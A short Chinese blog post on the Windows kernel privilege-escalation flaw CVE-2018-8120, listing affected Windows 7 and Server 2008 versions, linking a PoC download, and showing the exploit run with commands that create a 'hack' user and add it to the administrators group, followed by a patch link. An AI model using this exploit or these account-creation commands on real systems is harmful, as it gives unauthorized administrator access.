欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

CVE-2018-8120

程序员文章站 2022-07-15 16:01:46
...

简介

部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码。

影响版本

Windows 7 for 32-bit Systems Service Pack 1   
Windows 7 for x64-based Systems Service Pack 1       
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for Itanium-Based Systems ServicePack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 R2 for Itanium-Based Systems ServicePack 1
Windows Server 2008 R2 for x64-based Systems ServicePack 1
Windows Server 2008 R2 for x64-based Systems ServicePack 1

POC下载地址

https://github.com/alpha1ab/CVE-2018-8120

CVE-2018-8120

创建用户

CVE-2018-8120.exe "net user hack hack /add"

使用户加入administrators组

CVE-2018-8120.exe "net localgroup administrators hack /add"

CVE-2018-8120

可以发现用户已经是administrators组了

CVE-2018-8120

修复建议

打补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120

 

相关标签: 安全

上一篇: CVE-2014-1767

下一篇: 剑指offer——构建乘积数组

推荐阅读